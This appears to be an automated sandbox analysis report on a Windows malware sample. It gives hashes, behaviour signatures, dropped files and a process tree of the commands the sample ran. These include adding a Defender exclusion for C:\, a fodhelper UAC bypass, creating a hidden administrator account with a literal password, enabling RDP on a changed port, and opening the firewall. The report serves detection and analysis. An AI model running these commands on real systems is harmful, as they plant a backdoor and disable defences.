Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 15:33

General

  • Target

    a3e4a7c4f37f185ccd7696eece42348c.exe

  • Size

    117KB

  • MD5

    a3e4a7c4f37f185ccd7696eece42348c

  • SHA1

    f9cbc1d00796fe5a8debaef74d59c567277bfd60

  • SHA256

    7bc2536f2b4f69cb20c0d7f996aaedafab15cf4d73f54792e74ac72be3ecf01f

  • SHA512

    0f8396c64ec0bd8d9c97ea75811269e7e9cc4c388b770343b59f54c89663f51bce9df4aabda0095e1a37c801e01badbb1c8976479d6aa430fccff8dfea431353

  • SSDEEP

    384:Gmjw/SoQzbZlKp6yTcKnwYQFITaxV+avOUrIL+330jaYtL5oNEASAFxG/yD494JI:G+LbqpHwmMREo0jaf6sFSyD5rh2T

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 11 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a3e4a7c4f37f185ccd7696eece42348c.exe
    "C:\Users\Admin\AppData\Local\Temp\a3e4a7c4f37f185ccd7696eece42348c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1584
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /min "xs [DarkTeam]" "cmd.exe" "/k @echo off && powershell.exe -Command Add-MpPreference -ExclusionPath C:\ && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Windows\system32\cmd.exe
        "cmd.exe" "/k @echo off && powershell.exe -Command Add-MpPreference -ExclusionPath C:\ && exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command Add-MpPreference -ExclusionPath C:\
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3480
    • C:\Users\Admin\AppData\Local\Temp\6PkklzQ3.exe
      "C:\Users\Admin\AppData\Local\Temp\6PkklzQ3.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3520
      • C:\ProgramData\uovan\svrreve.exe
        "C:\ProgramData\uovan\svrreve.exe"
        3⤵
        • Allows Network login with blank passwords
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\System32\fodhelper.exe
          "C:\Windows\System32\fodhelper.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1480
          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
            "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4248
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3436
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:700
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2024
                • C:\Windows\system32\find.exe
                  Find "="
                  8⤵
                    PID:4616
                • C:\Windows\system32\net.exe
                  net user defaultuserx StffXruf3331 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1404
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user defaultuserx StffXruf3331 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                    8⤵
                      PID:3332
                  • C:\Windows\system32\net.exe
                    net localgroup Administrators defaultuserx /add
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4204
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 localgroup Administrators defaultuserx /add
                      8⤵
                        PID:4124
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2332
                      • C:\Windows\System32\Wbem\WMIC.exe
                        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2012
                      • C:\Windows\system32\find.exe
                        Find "="
                        8⤵
                          PID:4376
                      • C:\Windows\system32\net.exe
                        net localgroup "Remote Desktop Users" defaultuserx /add
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1388
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 localgroup "Remote Desktop Users" defaultuserx /add
                          8⤵
                            PID:3024
                        • C:\Windows\system32\net.exe
                          net accounts /forcelogoff:no /maxpwage:unlimited
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2212
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                            8⤵
                              PID:1940
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                            7⤵
                              PID:5012
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f
                              7⤵
                                PID:960
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                                7⤵
                                  PID:2760
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\Licensing Core" /v "EnableConcurrentSessions" /t REG_DWORD /d 0x0 /f
                                  7⤵
                                    PID:2444
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f
                                    7⤵
                                      PID:3552
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x0 /f
                                      7⤵
                                        PID:2856
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
                                        7⤵
                                          PID:2272
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 0xd3d /f
                                          7⤵
                                            PID:3656
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v defaultuserx /t REG_DWORD /d 0x0 /f
                                            7⤵
                                              PID:764
                                            • C:\Windows\system32\attrib.exe
                                              attrib C:\users\defaultuserx +r +a +s +h
                                              7⤵
                                              • Sets file to hidden
                                              • Views/modifies file attributes
                                              PID:1812
                                            • C:\Windows\system32\netsh.exe
                                              netsh advfirewall firewall del rule="Remote Desktop"
                                              7⤵
                                              • Modifies Windows Firewall
                                              PID:380
                                            • C:\Windows\system32\netsh.exe
                                              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 action=allow
                                              7⤵
                                              • Modifies Windows Firewall
                                              PID:1944
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                              7⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3108
                                      • C:\Windows\System32\fodhelper.exe
                                        "C:\Windows\System32\fodhelper.exe"
                                        4⤵
                                          PID:2032
                                          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                            "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ddttd.exe -i
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2540
                                            • C:\Users\Admin\AppData\Local\Temp\ddttd.exe
                                              "C:\Users\Admin\AppData\Local\Temp\ddttd.exe" -i
                                              6⤵
                                              • Sets DLL path for service in the registry
                                              • Executes dropped EXE
                                              • Modifies WinLogon
                                              • Drops file in System32 directory
                                              • Drops file in Program Files directory
                                              PID:4980
                                              • C:\Windows\SYSTEM32\netsh.exe
                                                netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                7⤵
                                                • Modifies Windows Firewall
                                                PID:4048
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF54D.tmp.bat""
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2816
                                        • C:\Windows\system32\timeout.exe
                                          timeout 7
                                          4⤵
                                          • Delays execution with timeout.exe
                                          PID:1460
                                        • C:\Windows\system32\whoami.exe
                                          whoami
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4944
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                    1⤵
                                      PID:3088
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                      1⤵
                                      • Loads dropped DLL
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4796

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      450427af6be6ec710ffb349487871490

                                      SHA1

                                      7cc431b8914d68e01b451a3f6b3e718e22a410a0

                                      SHA256

                                      770115f2b5578724e6f35f1dc5ea28c064c53e8c3e60c69342969cc919d9b23a

                                      SHA512

                                      754766f7221e5598fdc449d83789aaa0961a5d9f9f0571c93f92b06db418aca282fcd31443e737967cf288b1c24d84aa2a8f19a9b799b5f02482954b3c0febb3

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      64B

                                      MD5

                                      79338af2a98e6975ffb2ff2cfcd91c45

                                      SHA1

                                      85b70526440a7c93fddd6334cb8243c72bc34a43

                                      SHA256

                                      0c86eaea0e79eff377ec82d6d2f4867b750725173916e9699b567ab2ff0137a7

                                      SHA512

                                      aba86beb5b6a6660010675e4430b5b6a67480e8ebb0a3629a7c47244c29badc19067aee2521706d64f8db6d70aaf388a259060ff5952fdac4c8320dcc1618c76

                                    • C:\Users\Admin\AppData\Local\Temp\6PkklzQ3.exe

                                      Filesize

                                      1.9MB

                                      MD5

                                      7ddeccf7c147ea2b90426aeb43277096

                                      SHA1

                                      a350f7403f25add29a464491d37f56b5381d4a73

                                      SHA256

                                      f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb

                                      SHA512

                                      2b0f23fdc66cfe90c329474669109320694107f140e5d3b95338833211b4c6fa58a627583babd256fb045444f609020ce544c2a3c14e5d85c46ee76bc71ca7af

                                    • C:\Users\Admin\AppData\Local\Temp\Snup.bat

                                      Filesize

                                      2KB

                                      MD5

                                      6df063e63ff09a93c843408e90735396

                                      SHA1

                                      00d4f793ca9f1862999c616304149aca9f3b3ee4

                                      SHA256

                                      874c94bafb1361799e79e58580cf474fe4406a191e4533c86181dd73f4b34676

                                      SHA512

                                      c38c1525398a2b2d2a96a63f1e1e905861b6db7bca41f9548fd3f352fe8ca74bee6fc798b4a2dc711db98dde765548b5adca31bd2c00b9da38f90f404c109abd

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0wj2qxp.u3i.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Local\Temp\ddttd.exe

                                      Filesize

                                      457KB

                                      MD5

                                      75d0509f3674ab4ea21964828a94050c

                                      SHA1

                                      9e9a9b703e4de7006822ef6aa525389c67a5b2f7

                                      SHA256

                                      cbdca2f7e9e90275b946b7e87061092b127b46e5474f26b27093f7ce24e54d8d

                                      SHA512

                                      0f1360b520e402bcc3d9ddc9a163b93ced0ef535d9b85c2cb057585c8e0cc00cc5627a02b5b9caca6b32bc641d8e5f815c48257091b66ab7bb84baf97892dfeb

                                    • C:\Users\Admin\AppData\Local\Temp\tmpF54D.tmp.bat

                                      Filesize

                                      168B

                                      MD5

                                      c1db761548a7415e39e98d8aba9303ad

                                      SHA1

                                      a39be21074c93ee0d98f74203950cc81ea4e9349

                                      SHA256

                                      d8ac4a9e17f1b74f935258dbf87f975e409636e190a3416d26c14f20957454ac

                                      SHA512

                                      1de0d3209d0b31264ec5b41375090559a8564bda1b9a7befd7875eabb94da9c5671f763fac107968d8b7d155d147e2793db174bef4590fb0d5cd037df79a3a65

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      6KB

                                      MD5

                                      3163a2ed27b343407c0642536887c814

                                      SHA1

                                      6f4a8a156fb7deaa042ba2ec0a90c3deeb2bf414

                                      SHA256

                                      8953c8cc136b22ab7631e8129e643bc79db32a0aa724c10b6655c12e167eb4b5

                                      SHA512

                                      f34335f5b54c59891e992484b22b594e77355b82fa4376c973905081a495cce15bc505603b52b87798da8e42cabc4449dfdb63f4171dba6f07c4a236bf7eb108

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      6KB

                                      MD5

                                      14838e80c410d2c34180ed0e23a6acee

                                      SHA1

                                      5f44a1239591ec8a887bb45916fad9196d7bf8a5

                                      SHA256

                                      c884cfe23b45eff6d0474d64a90d238e1e63d2f525c9a8ee83a4bb7684edb974

                                      SHA512

                                      12c20b4df6ca721f928d87cfaf1cec6c8639253fe11702965018eef58387a1ba03f24b092b26b3fef2ac480bc2ddd0caecfcb697b8353ef5231afbcac8542a05

                                    • \??\c:\program files\rdp wrapper\rdpwrap.dll

                                      Filesize

                                      48KB

                                      MD5

                                      717a1b9b62a41e3be5e271c2e8260c37

                                      SHA1

                                      a7bb15320a7630cb8ca7832f47b9bb9f7693376d

                                      SHA256

                                      fd30783e367862e0d9083af1e12b4fa0edd93bb7978a355212cad8c85ab1a480

                                      SHA512

                                      c50f349b1029805b747fae40713f865c36dc83b6553a1439dfab32a3cb3b13603b00caa2d4656b81b40d9fd4cd649abbe131f6aacd31ddd3d0448d55e2babe8a

                                    • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                      Filesize

                                      432KB

                                      MD5

                                      03a0f53a4e7702d676d485af3cc17561

                                      SHA1

                                      27d45d2732f7592d9713977bc69e02f2997fc879

                                      SHA256

                                      da25861aea3ba907e42fea0884f4ffb3fe9c5382c28adc9bcc395bf4de367220

                                      SHA512

                                      9cc15378b4c55c77ecc08434eb7d36aeb4f18a4353f5ec02e385d49fc0e09ff1d4639053bb15220af5a3a58c5ebd39472d3e039a12c115d45133deb43883d15d

                                    • memory/1584-1-0x00000231F1880000-0x00000231F18A4000-memory.dmp

                                      Filesize

                                      144KB

                                    • memory/1584-2-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/1584-19-0x00007FFD6ECA3000-0x00007FFD6ECA5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1584-20-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/1584-0-0x00007FFD6ECA3000-0x00007FFD6ECA5000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/1584-34-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3480-13-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3480-12-0x000001BBC4630000-0x000001BBC4652000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3480-18-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3480-14-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3480-17-0x00007FFD6ECA0000-0x00007FFD6F761000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3520-33-0x0000015FF3B00000-0x0000015FF3CE8000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/4796-104-0x00007FFD7E7D0000-0x00007FFD7E7F6000-memory.dmp

                                      Filesize

                                      152KB

                                    • memory/4796-108-0x00007FFD7E7D0000-0x00007FFD7E7F6000-memory.dmp

                                      Filesize

                                      152KB

                                    • memory/4980-98-0x0000000000400000-0x00000000005AF000-memory.dmp

                                      Filesize

                                      1.7MB

                                    • memory/4980-106-0x0000000000400000-0x00000000005AF000-memory.dmp

                                      Filesize

                                      1.7MB